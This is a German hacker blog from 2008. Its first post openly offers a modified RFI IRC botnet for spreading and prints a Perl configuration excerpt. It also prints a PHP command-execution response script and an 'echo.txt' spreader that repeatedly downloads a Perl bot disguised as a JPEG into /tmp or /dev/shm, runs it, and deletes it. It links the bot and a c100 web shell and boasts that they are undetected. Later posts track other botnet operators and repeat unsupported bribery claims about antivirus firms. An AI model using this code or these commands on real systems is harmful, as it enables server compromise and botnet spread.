# (Besonders, wenn Sie auf 0day Bugs scannen), soviele verletzbare Aufstellungsorte. Es kann dazu führen das der bot weiterhin sichselbst flooded und kickt allerdings nicht shcon bei 100 threads oder so :)
# gerade wenn ihr auf ätere Bugs scanned, wo nicht viele Resultate sind, können Sie eine höhere Zahl, so schneller geht es
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "http://xxx.xx.xx/ehxxxxac/echo.txt??";

my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled

### Ihr braucht nur ein Passwort wenn ihr $securityACT auf 1 (an) gestellt habt

my $killpwd = "PW"; #Password to Kill the Bot
my $chidpwd = "PW"; #Password to change the RFI Response
my $cmdpwd = "PW"; #Password to execute commands on the server
my $secpwd = "PW";
my $spreadpwd = "PW";

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

So schauen wir uns den Bot mal etwas genauer an damit ihr die wichtigsten commands wisst :) wobei dadurch das die Info etc. auf deutsch ist solltet ihr keine probleme haben denke ich nur das Suchmaschienen abfragen musste ich leider auf Englisch beibehalten da es sonst probleme mitn Bypass gegeben hätte.

So sieht der Bot im Channel aus

Hier der Virenscan von jotti auf den RFI-Bot (100% UD)

So wie ihr sehen könnt ist dieser RFI-Bot komplett clean ist nirgends bekannt etc also viel spaß beim spreaden :)

Hier habt ihr die id.txt diese ist wichtig für die RFI-Abfrage

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>



<H1>Osirys</H1>



</html></head></body>



<?php



if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){



echo("Safe Mode of this Server is : ");



echo("SafemodeOFF");



}



else{



ini_restore("safe_mode");



ini_restore("open_basedir");



if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){



echo("Safe Mode of this Server is : ");



echo("SafemodeOFF");



}else{



echo("Safe Mode of this Server is : ");



echo("SafemodeON");



}



}



function ex($cfe){



$res = '';



if (!empty($cfe)){



if(function_exists('exec')){



@exec($cfe,$res);



$res = join("\n",$res);



}



elseif(function_exists('shell_exec')){



$res = @shell_exec($cfe);



}



elseif(function_exists('system')){



@ob_start();



@system($cfe);



$res = @ob_get_contents();



@ob_end_clean();



}



elseif(function_exists('passthru')){



@ob_start();



@passthru($cfe);



$res = @ob_get_contents();



@ob_end_clean();



}



elseif(@is_resource($f = @popen($cfe,"r"))){



$res = "";



while(!@feof($f)) { $res .= @fread($f,1024); }



@pclose($f);



}



}



return $res;



}



exit;

diese ladet ihr auf irgendeinem Host rauf und verlinkt diese dann im Bot unter RFI-Response.
als nächstes wollenw ir ja das der Bot auch spreaded XD ne :) also machen wir uns eine echo.txt wo folgendes drin ist.

<title>By 1x33x7</title>
<h1>lol@gmail.com</h1>
<?
shell_exec('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp; wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
system('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /tmp;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;wget http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;curl -O http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lwp-download http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;lynx -source http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;fetch http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;GET http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
passthru('cd /dev/shm;get http://xxx.xxxx.xx/exxxxxxxxac/new3.jpg >new3.jpg;perl new3.jpg;rm -rf new3*');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
shell_exec('cd /tmp;rm -rf new3**');
shell_exec('cd /dev/shm;rm -rf new3**');
system('cd /tmp;rm -rf new3**');
system('cd /dev/shm;rm -rf new3**');
passthru('cd /tmp;rm -rf new3**');
passthru('cd /dev/shm;rm -rf new3**');
?>

" http://xxx.xxxx.xx/exxxxxxxxac/ " diesen Link bitte mit euren austauschen wo ihr die sachen hochgeladen habt
danach ladet ihr auch diese txt auf euren hoster hoch und verlink diesen im Spreadfeld von der Bot-Konfiguration nun solltet ihr noch die restlichen daten ausfüllen wie irc server etc und euch steht einem erfolgreichen RFI-Spread nichts im wege. Achja fast hätte ich es vergessen ich lege noch eine c100 shell mit bei :) diese Version hier

* Locus7s Modified c100 Shell
* Beta v. 2.0a - Project x300
* Written by Captain Crunch Team
* Modified by Shadow & Preddy
* Re-Modified by SoH-uNi (23.6.08)

So hier jetzt der Downloadlink für den bot und die tools :)

Download :

Ksteal.by.Osyris.Priv8.mod.by.1x33x7
http://www.ziddu.com/downloadfile/1887743/KstealbyOsyrisPriv8modby1x33x7.rar.html

id.txt
http://www.ziddu.com/downloadfile/1887744/id.rar.html

echo.txt
http://www.ziddu.com/downloadfile/1887746/echo.rar.html

c100 Shell
http://www.ziddu.com/downloadfile/1887745/c100.rar.html

So viel Spaß beim rumspielen und testen :) solange er noch Undetected ist :D was sicherlich nichtmehr lange
anhalten wird denke ich mal.

Einen schönen Tag wünsche ich euch weiterhin noch
mfg Bloody

von Bloody - veröffentlicht in: RFI (Perlbot/Phpbot/etc.) - Community: 1x33x7
Kommentar hinzufügen - Kommentare () - empfehlen

Sonntag, 10. august 2008

Dj Bloody - Sesseion #1 -10.08.08-

Hallo,
Heute habe ich mal ein bisschen selbstgemixxte Musik für euch wenn ihr Chillout, Trance, Electro, Techno, Hardstyle und Jumpstyle mögt werden euch die verschiedenen mixxes sicherlich gefallen.

Folgende Mixxes stehen ab sofort zum Download für euch bereit:

Dj Bloody - Gummibears bam däng
Genre : Trance, Techno
Größe : 5,9 MB
Länge: 4:14 Minuten

Download :
http://www.ziddu.com/downloadfile/1886038/DjBloody-Gummibearsbamdng.mp3.html

Dj Bloody - Single Day on Extasy
Genre : Chillout, Trance, Hardstyle, Techno
Größe : 9,2 MB
Länge: 6:33 Minuten

Download :
http://www.ziddu.com/downloadfile/1885718/DjBloody-SingleDayonExtasy.mp3.html

Dj Bloody - yo gimme something to smoke and dance (I wonna puff puff)
Genre : Hardstyle, Trance, Techno
Größe : 12,6 MB
Länge: 9:00 Minuten

Download :
http://www.ziddu.com/downloadfile/1886039/dy-yogimmesomethingtosmokeanddanceIwonnapuffpuff.mp3.html

Dj Bloody - Are you ready for Chillout over Hardstyle
Genre : Chillout, Trance, Hardstyle, Techno, Jumpstyle, Electro
Größe : 45,4 MB
Länge: 32:18 Minuten

Download :
http://www.ziddu.com/downloadfile/1887244/DjBloody-AreyoureadyforChilloutoverHardstyle.mp3.html

Dj Bloody - Extasy groove
Genre : Techno, Trance, Electro, Chillout
Größe : 12,5 MB
Länge: 8:54 Minuten

Download :
http://www.ziddu.com/downloadfile/1886822/DjBloody-Extasygroove.mp3.html

Dj Bloody - Journey into Africa bombata
Genre : Hardstyle, Trance
Größe : 9 MB
Länge: 6:26 Minuten

Download :
http://www.ziddu.com/downloadfile/1886820/DjBloody-JourneyintoAfricabombata.mp3.html

Dj Bloody - all right now (partybreak)
Genre : Hardstyle, Creazy breakbeat
Größe : 1,2 MB
Länge: 0:54 Minuten

Download :
http://www.ziddu.com/downloadfile/1886821/DjBloody-allrightnowpartybreak.mp3.html

So das wars dann auch mit mixxes es werden bald mehr folgen :) am besten ihr schreibt ein kommentar was für Genres/songs in den nächsten Mixes/Remixes vertreten sein soll :)
So dann wünsche ich euch noch einen schönen Tag und viel spaß beim Musik hören :)

Bis zum nächsten mal mfg Bloody

von Bloody - veröffentlicht in: Mp3-mixxes
Kommentar hinzufügen - Kommentare () - empfehlen

Freitag, 1. august 2008

Den #h4x0rs rfi-chan gefunden und Snake ist Admin

Hallo,
Seid gegrüßt liebe mitleser :)

ich habe malwieder versucht ein paar *neue* rfi-bots und channel zu finden,
scheint mir wohl sogar gelungen zu sein :D ich habe folgende Seite gefunden die anscheind zum spreaden
benutzt wird oder benutzt wurde. [Hier ein Bild]

So schauen wir mal ob der link zu http://utenti.lycos.it/kaizoku384/nix/id4.txt noch Online ist.
Jawoll!!! ist noch online nun nehmen wir das id4.txt wech und gehen auf http://utenti.lycos.it/kaizoku384/nix/
villt kriegen wir ja eine Ordneransicht währe doch cool. [Hier ein Bild]

Super ist das nicht geil XD nun sehen wir den Odner von unserem Opfer dort ist ja auch einiges drauf,
also schauen wir uns doch mal die sachen genau an wie ihr sehen könnt finden wir hier 2 jpeg Dateien vor
ich öffne jetzt die new3.jpg einfach mal mit ue32 mal schaun was sich dort tut. Früher wurden ja die
rfi-bots auch mit sogenannten fake Bildern versehen um beim spreaden nicht so aufzufallen aber wir sind
ja auch nicht Dumm oder ? :D also mal schaun was kommt. [Hier ein Bild]

Jo damit habe ich echt schon fast gerechnet diese jpeg datei ist in wirklichkeit ein rfi-bot wie ihr ja
wohl deutlich erkennen könnt auf den oberen beiden fotos mal schaun wo uns das ganze hinführt.
So also nun haben wir ja die irc daten also schaun wir doch mal was dort so los ist grml der erste
Server geht schonmal nicht das ist der ##$servidor='diesler.com' also testen wir mal den nächsten :)
hmmm so wie es aussieht sind die nächsten irc-server wohl alle online allerdings treffen wir leider
niemanden in #h4x0rs an naja auch egal schaun wir uns mal weiter die anderen bots dort an
(bevor ich es vergesse die save.jpg ist die ID) .
So als nächstes nehme ich mal die botcew.txt dieses scheint ein fighter script zu sein :( die sollen
auf folgenden server gehen wo ich allerdings nur den abwesenden Admin angetroffen habe

Wie ihr sehen könnt kommt dieser Snake wohl aus Italien wenn er keinen proxy benutzt ansonsten pech
aber ist auch nur nebensache schauen wir uns die nächste datei namens Cscan.txt dort findenw ir den
selben server und channel wie oben also auchnix los also den nächsten schaun und zwar die O2.txt
dort finden wir den Server my $ircserver = "irc.darksin.net"; und der Channel ist
my $channel = "#ThE_SnAKe®"; wo allerdings auch nur 2 bots drinne sind aber anscheinend
steigern wir uns :)

Now talking in #ThE_SnAKe®
* Topic is '#ThE_SnAKe® Private '
* Set by |`SnAKe`| on Wed Jul 30 17:09:35

Naja wieder raus dort und nächste datei anschaun die zscan.txt das ist der EXTREME SCAN V3 ich
kann leider nicht dorthin connecten villt klappt es ja später hier die daten

#my $server="irc.allindo.net";
my $canale="#h4x0rs";

also machen wir auch mal weiter die perl 1-3 und ztest Textdateien bestehen aus einem exec Script
wie es so oft zum spreaden angewandt wird. So mal schaun wie sich *Snake* weiterhin verhält ich werde
euch natürlich auf den laufenden halten. Dann würde ich mal sagen bis zum (ich könnte wetten) nächsten
mal wenn ich dich finde. Hier nocheinmal als mirror die dateien die auf dem Webspace Server drauf waren

Download :
http://www.ziddu.com/download/1811116/rfi-botsfromSnakeinh4x0rs.rar.html

von Bloody - veröffentlicht in: Found Botnets
Kommentar hinzufügen - Kommentare () - empfehlen

Freitag, 25. juli 2008

Die Verfolgung von "Helen" und das Interview

Jo meinsen ersmal,
so heute nehme ich unseren "Helen" mal ein bisschen mehr unter beschuss da ich schonwieder was von
ihm gefunden habe. Wir erinnern uns "Helen" habe ich schon 2 ftps und 2 netze discovered hier nochmal ein kleiner überblick über seine alten netze:
Alt und auch schon off:
ftp://81.177.8.194/Upload/tmp/trem/
Neuer und noch online
ftp://212.11.127.86/tmp/trem/
So nun gehts weiter viel spaß :)
Und zwar habe ich éinen neuen ftp gefunden den er für rfi bots benutzt. Dieses mal ist es der
ftp://193.253.223.43/tmp/trem/
wie immer ist dieses wohl ein Public ftpd wo das uploaden von dateien erlaubt ist :( und auch dort finden wir wie auch sonst unseren kleinen rfi-bot von "Helen" naja wird sicherlich nicht der einzigste sein den wir in unserer heutigen session finden werden :( naja suchen wir mal weiter bei google :D (was würde man nur ohne google heutzutage tun). Zack und schonwieder einen gefunden der noch on ist allerdings wo "Helen" schon vertireben wurde wie es ausschaut da dort einige "tagger" schon unterwegs waren und komplett zugemüllt ist hier die adresse.
ftp://24.227.40.218/temp/trem/
naja wir wurschteln uns langsam aber sicher durch seine komplette History villt ja mit dem erflog ihn zu catchen also weitersuchen(wer suchet der findet :D). rofl ey scheiß Windows stottert grade rum nachdem ich auf ne "unseriöse seite" gegangen bin klar ersmal den firefox abgewürgt *THX HELEN XD*.
Ui so wieder alles restartet und prompt belohnt :D habe wieder einen ftp gefunden wo allerdings keine rechte haben etwas zu saugen *guter admin* hier der Server wo ich mich grade rumtreibe scheint auch wieder nen total
ftp://212.77.102.100/incoming/upload/trem/
verkorkster public ftpd zu sein scheint ja nichts neues zu sein wo Helen sich da rumtreibt :D und wieder einer aber ist off der ftpd
ftp://84.32.137.157/incoming/upload/trem/
also weiterschaun :) So das wars was Google erstmal über Helen und seine ftp verbreitung ausgespuckt hat aber so leicht lassen wir uns ja nicht abschütteln :D ich werde so lange suchen bis wir ein interview führen können :) mit "Helen" was ich euch natürlich unter keinen umständen vorenthalten werde :D
geilomat ich habe ihn nun doch auf seinem irc angetroffen und werde versuchen ein interview mit ihm durchzuführen mal schaun was bei rumkommt. So leider muss ich sagen der "Helen" war alles andere als begeistert mich zu sehen beschimpft mich mit noob und weis der geier was für sachen obwohl ich doch nur ein normales interview machen wollte. Meine fragen woher er kommt hat er ignoriert und auch das dies was er macht illegal sei hat er ignoriert und meinte er will mich bei irgendwelchen netadmins reporten. wie dumm muss man eigendlich sein :D naja auch egal hier das kurze aber villt für euch witzige gespräch :D viel spaß beim lesen. Falls ihr selber mal sach sagen wollt
IRC-Server = smile.homeunix.net
Port = 6667
Channel = #star
Hier ist nun mein Interview wiegesagt er hat nicht viel geredet sondern relativ gleich gebannt was für mich heisst das er mit der sache mehr zu tun hat als er villt zugibt oder wie bisher gefunden haben :D

* Now talking in #star
* Topic is ''
* Set by Unix on Thu Jul 17 22:04:32
<~Helen> hello
<Bloody> Hello Helen
<~Helen> can i help u?
<Bloody> i think you know me ;)
<~Helen> can i help u?
<Bloody> can we make an intervie
<Bloody> w
<~Helen> get out from this room
<~Helen> is +s
<Bloody> sec
<Bloody> i am an reporter
<Bloody> :)
<Bloody> i wrote some articles about you and your nets
<~Helen> u are a lamer
<~Helen> that have a forum
<Bloody> know it would be nice if i could interview you :)
<~Helen> and copy/past codes
<Bloody> no forum got kicked :D
<~Helen> and get all files around the net
<~Helen> i know
<Bloody> i just report ....
<~Helen> that work is lamer work
<Bloody> its all public shit
<Bloody> yea can be
<~Helen> that meanes u dont know nothing about it and u go around copying codes and getting files then u host them on your blog
<Bloody> so are you ready for interview ?
<Bloody> from where are you comming ?
<~Helen> i'm ready to ban u
<Bloody> is russia right ?
<~Helen> and if i will find a netadmin i will repato u
<Bloody> why report me ?
<Bloody> u do illegal stuff
<Bloody> u upload rfi-bots to public ftps and spread with it
-irc.Smile.net- *** You are permanently banned from irc.Smile.Net (abuse) Email kline@irc.Smile.Net for more information.
* Disconnected

Einen schönen Tag wünsche ich euch allen noch und bis zum nächsten mal
euer Bloody

von Bloody - veröffentlicht in: Found Botnets
Kommentar hinzufügen - Kommentare () - empfehlen

Sonntag, 20. juli 2008

1x33x7 Newspaper 20.07.08

Inhalt:
1.
Software und Anti-Viren Programmierer geraten immer mehr unter Verdacht bestechlich zu sein und Industriespionage zu betreiben. Wir haben die Aussagen von Mitarbeitern !!!
2.
Immer mehr RFI-Botnetzwerke und das wiedertreffen eines alten Bekannten !!!

Software und Anti-Viren Programmierer geraten immer mehr unter Verdacht bestechlich
zu sein und Industriespionage zu betreiben Wir haben die Aussagen von Mitarbeitern !!!

Hallo und Willkommen auf meinem Blogg es ist malwieder an der Zeit hier ein bisschen Dampf abzulassen da es so nichtweitergehen kann mit den Software Herstellern und Anti Viren Programme wer ist heutzutage noch Freund wer ist der Feindist etwa das nette kleine icon von NOD32,symantec,etc in unserer rechten Taskleiste zum Feind geworden ? Werden wir etwa ausspioniert von den leuten die wir bezahlen damit wir glauben Sicher im Internet surfen zu können. Aber wer weis das schon wie soll man heute noch Freund oder Feind auseinanderhalten soweit wie der "Hacker Fortschritt" zurzeit gekommen ist.

Meist können wir Freunde ja nichteinmal die Feinde bekämpfen ohne selbst ein Feind zu sein !!!
Also bleibt einem meist ja nurnoch das recht über meinungsfreiheit übrig und man muss es selber in die Hand nehmen auch wenn man sich zum großen teil stark an der schwelle von der Legallität bewegt aber was soll man auch sonst tun schauen wir uns doch einmal die ganzen Anti-Virus Firmen an wie kann es zum z.b. möglich sein das ein Viren Programm in diesm falle von "Symantec" über mehrere Monate eine akute gefährliche Sicherheitslücke hat und weder die Verantwortlichen noch die Betreiber von Symantec auf E-mails mit eienr Benachrichtigung über die Sicherheitslücke nicht geantwortet wird geschweige den überhaupt gelesen. Da fragen sich Sicherlich viele ! Ist das normal so ?Und ich kann leider nur sagen ja es ist normal traurig aber wahr, denn auch die Anti Virus Betreiber merken das man damit Geld machen kann und wie sagt man doch bei geld hört jede FREUNDschaft auf also werden jetzt die ehemaliegen Freunde langsam zu feinden ? Das kann ich leider nicht wirklich beantworten aber wenn man sich das so teilweise anschaun man posted z.b. eine datei auf "jottis Virusscan" (deine Seite ist echt Top) in diesem falle nehme ich mal den Bifrost 1.3 trojaner nicht crypted nicht gepackt in der original version schaut euch mal an der Trojaner wird von fast jedem Programm erkannt.

Bis auf 4 Programme worunter auch NOD32 ist was als eines der besten Anti-Viren Programme gilt die zurzeit auf dem markt sind nach NOD32 aussagen aber wieso erkennt NOD32 dann nicht einen 2 jahre alten Trojaner und das sind ja auch wirklich nicht die einzigsten sachen die NOD32 nicht erkennt und auch die anderen Anti-Viren Programme wie Norton,Symantec, Mcafee, und der ganze andere rest.
So habe ich aus Indonesischer Quelle erfahren das einige Anti-Virus Firmen (Darunter auch 2 der größten Virenprogramme Hersteller.)(Namen möchte ich erstmal nicht weiter nennen.) von meist ausländische Firmen (indonesien,irak,etc) große mängen Geld (Wir reden hier von mehreren 100.000 Dollar) bekommen nur damit z.b. ein "RXBOT" mit topaktuellen exploit ein
